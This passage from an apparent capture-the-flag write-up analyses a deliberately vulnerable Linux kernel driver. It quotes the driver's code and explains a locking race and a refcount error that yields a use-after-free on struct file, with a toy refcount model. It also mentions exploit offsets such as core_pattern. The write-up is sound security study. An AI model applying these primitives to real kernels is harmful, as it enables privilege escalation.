What’s cool about this exploit strategy is that it doesn’t require breaking KASLR, so there are no hardcoded offsets that change from kernel to kernel, except maybe the offset of the field f_mode inside struct file, which I believe is unlikely to change much and can be figured out. The exact same exploit would work for every Linux system with the vulnerable driver. In contrast, my exploit needs the offsets of two symbols to be adjusted: core_pattern and no_llseek. And they do change between versions.

Unintended bugs

I was told there are two unintended bugs that I missed. Let’s take a look at them.

Missing locking

In blunder_alloc_get_buf we are not taking the lock alloc->lock, which could lead to race conditions.

  
struct blunder_buffer *blunder_alloc_get_buf(struct blunder_alloc *alloc,
                                             size_t size)
{
    struct blunder_buffer *buf = NULL;
    struct blunder_buffer *new_buf = NULL;
    list_for_each_entry(buf, &alloc->buffers, buffers_node) {
        if (atomic_read(&buf->free) && buf->buffer_size >= size) { // [1]
            // Is there enough space to split? Then do it!
            uint64_t remaining = buf->buffer_size - size;
            if (remaining > MIN_BUF_SIZE) {
                // Make new buf at the end of this buf
                new_buf = (struct blunder_buffer *)((void *)&buf->data[size]);
                // New buffer size is remaining - header
                new_buf->buffer_size = remaining - sizeof(*new_buf);
                // Adjust old buffer size to size
                buf->buffer_size = size;
                // Mark as free
                atomic_set(&new_buf->free, 1);
                // Add to list after our current entry
                list_add(&new_buf->buffers_node, &buf->buffers_node); // [2]
            }

            // Mark buf as non-free and return it
            atomic_set(&buf->free, 0); // [3]
            return buf;
        }
    }

    // If we got here we're out of mem!
    return NULL;
}

Then, in blunder_send_msg:

  
[...]
buf = blunder_alloc_get_buf(&target->alloc, umsg.data_size + umsg.offsets_size);
if(!buf) {
	ret = -ENOMEM;
	goto release_msg;
}
buf->data_size = umsg.data_size;

[...]

if (copy_from_user(buf->data, umsg.data, umsg.data_size)) { // [4]
	ret = -EFAULT;
	goto release_buf;
}
[...]

For example, this can lead to a single buffer being associated with two different messages sent by two different threads if both threads get to [1] but neither of them has marked the buffer as not free in [3] yet. If one of the messages splits the buffer, a new buffer will be created and linked in [2]. If the other message doesn’t split the buffer, its data could overwrite the metadata of new_buf when it is copied in [4].

UAF

When sending a message with file descriptors, in blunder_import_fds the driver calls fget on each of them and stores the resulting struct file* in the blunder_message:

  
static int blunder_import_fds(struct blunder_message *msg, int * __user ufds, int num_fds) {
	[...]
	for(i=0; i < num_fds; i++) {
		msg->files[i] = fget(fds[i]); // [1]
		if (!msg->files[i]) {
			break;
		}
	}
	msg->num_files = i;
	return 0;
}

Then, when receiving the message in blunder_recv_msg:

  
static int blunder_recv_msg(struct blunder_proc *proc, struct blunder_user_message * __user arg) {
	[...]
	for (curr_fd=0; curr_fd < msg->num_files; curr_fd++) {
		fds[curr_fd] = get_unused_fd_flags(O_CLOEXEC); // [2]
		if (fds[curr_fd] < 0) {
			/* Can't make a new fd, return error */
			ret = -ENOSPC;
			goto out_release;
		}
		fd_install(fds[curr_fd], msg->files[curr_fd]);
	}

	[...]
	out_release:
	/* Close the fds we have installed so far */
	if (curr_fd) {
		while(--curr_fd) {
			close_fd(fds[curr_fd]); // [3]
		}
	}

	/* Free the message and buffer */
	blunder_release_msg(proc, msg);
	return ret;
}

  
static void blunder_release_msg(struct blunder_proc *proc, struct blunder_message *msg) {
    int f;
    spin_lock(&proc->lock);
    if (msg->files && msg->num_files) {
        /* Files not transfered to userspace must be released. */
        for (f = 0; f < msg->num_files ; f++) {
            fput(msg->files[f]); // [4]
        }
        kfree(msg->files);
    }
    spin_unlock(&proc->lock);
    kfree(msg);
}

Let’s say two file descriptors are being sent. In [1], we call fget() on each of them, taking a reference. Then, when being received, let’s say the first call to get_unused_fd_flags() in [2] succeeds while the second fails. For the first file, it calls fd_install(fd, file), which basically performs current->files->fdt->fd[fd] = file, i.e., it installs the given file on the file descriptor table of the current process. As its docs say: “callers should treat it as if they had called fput(file)”, because fd_install doesn’t increase the refcount of the file. Then, when the call to get_unused_fd_flags() fails for the second file, we jump to out_release. There, we call close_fd(fd) in [3], which basically sets current->files->fdt->fd[fd] = NULL and calls fput(file) on the file that was previously there, dropping a reference. Finally, in [4] we call fput(file) on both files.

In the end, for the second file we have taken a reference in [1] and dropped it in [4], but for the first one we have taken a reference in [1] and dropped it in [3] and [4]. The problem is that we are calling fput() on a file that was previously passed to fd_install, despite the docs of fd_install saying that it consumes the refcount of the file.

The primitive described above allows us to decrease by one the reference counter of a file. If we open a file and apply this primitive, the associated struct file will be freed, and we’ll have a dangling pointer in our file descriptor tables, leading to UAF.
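The reference accounting can be followed with a toy model. It only tracks two counters for one file, following the sequence as described above. The struct and the toy_* helpers are invented for the illustration and do not correspond to kernel functions beyond their names.

```c
/* Toy model of one struct file: its reference count and how many
 * file descriptor table slots currently point to it. */
struct toy_file {
    int refcount;
    int fd_slots;
};

/* open(): one fd slot holding one reference. */
static void toy_open(struct toy_file *f) { f->refcount = 1; f->fd_slots = 1; }

/* fget(): take an extra reference. */
static void toy_fget(struct toy_file *f) { f->refcount++; }

/* fd_install(): a new slot points to the file and takes over the caller's
 * reference, so the count itself does not change. */
static void toy_fd_install(struct toy_file *f) { f->fd_slots++; }

/* close_fd(): clear the slot and drop the reference it held. */
static void toy_close_fd(struct toy_file *f) { f->fd_slots--; f->refcount--; }

/* fput(): drop a reference. */
static void toy_fput(struct toy_file *f) { f->refcount--; }

/* Sequence for the first file when the receive fails on the second one. */
static struct toy_file run_failed_recv(void)
{
    struct toy_file f;
    toy_open(&f);        /* sender opens the file           */
    toy_fget(&f);        /* [1] import takes a reference    */
    toy_fd_install(&f);  /* receiver installs it on a new fd */
    toy_close_fd(&f);    /* [3] error path closes that fd   */
    toy_fput(&f);        /* [4] release drops one more      */
    return f;
}
```

At the end the count is 0 while one fd slot, the sender's original descriptor, still points at the file. That is the dangling pointer.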

Conclusion

I hope you enjoyed this and learnt as much as I did, and thanks to Blue Frost Security for the challenge. Please don’t hesitate to contact me if you see something wrong, or for any question or clarification.